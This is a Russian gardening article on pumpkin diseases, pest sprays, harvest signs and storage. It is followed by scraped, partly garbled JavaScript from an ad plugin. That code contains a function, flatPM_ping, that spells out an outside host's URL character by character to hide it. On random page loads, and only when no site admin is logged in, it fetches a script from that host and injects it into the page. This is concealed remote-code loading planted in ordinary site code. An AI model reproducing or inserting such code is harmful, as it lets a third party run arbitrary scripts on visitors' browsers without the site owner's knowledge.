При обнаружении первых симптомомв грибковой болезни на листьях тыквы с ней борются опрыскиванием раствором 3 г перманганата калия или 2 г медного купороса, растворенных в 10 л воды.Проводят обработку 1% бордоской жидкостью в период формирования завязей и листьев. Для профилактики – проводят регулярный полив, соблюдают севооборот и уничтожают остатки заболевших растений.

Мучнистая роса на листьях тыквы

Мозаика тыквы

Опасное вирусное заболевание, инфицированные растения удаляют и сжигают подальше от участка. Профилактические меры: уничтожение сорняков, дезинфекция садового инвентаря, уничтожение паразитов, своевременное удаление пораженных участков.

Мозаика тыквы в начальной стадии

Гниль плодов

Загнившие участки аккуратно удаляют ножом и протирают ранку свежевыжатым соком алое. Место протирки засыхает, а тыква продолжает развиваться.

Гниль плодов тыквы

Способы защиты от насекомых

С тлей борются удалением сорняков, опрыскиванием мыльным раствором (200 г тертого мыла на 10 л воды) или 10% карбофосом в пропорции 60 г на 10 л воды.

От паутинного клеща помогает опрыскивание луковым настоем из 200 г шелухи на 10 л воды или 20% раствором хлорэтанола (20 г на 10 л воды).

Сбор урожая и условия хранения тыквы

Чтобы тыква не начала портится на огороде, нужно вовремя собрать урожай. Момент созревания можно распознать по следующим признакам:

  • Плодоножка становится грубой и шероховатой;
  • Листва и плети желтеют и сохнут;
  • Шкурка грубеет и приобретает типичный сорту рисунок.

Собрать урожай необходимо до устойчивых заморозков. Обрезка тыквы происходит с плодоножкой до 6 см. Срезанные плоды складывают в сухое теплое помещение. За неделю тыквы дозревают, а черенок засыхает.

Хранение тыквы в отапливаемом помещении

При наступлении заморозков недозревшие не сорванные тыквы мульчируют соломой или агроволокном.

Соблюдение всех условий и правил ухода за тыквой позволит вырастить богатый урожай. Вкусные и полезные овощи хорошо хранятся до Нового года без какой-либо обработки. Тыкву можно использовать для приготовления основных блюд, десертов, супов, консервировать, или сделать из нее фонарь на Хэллоуин.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};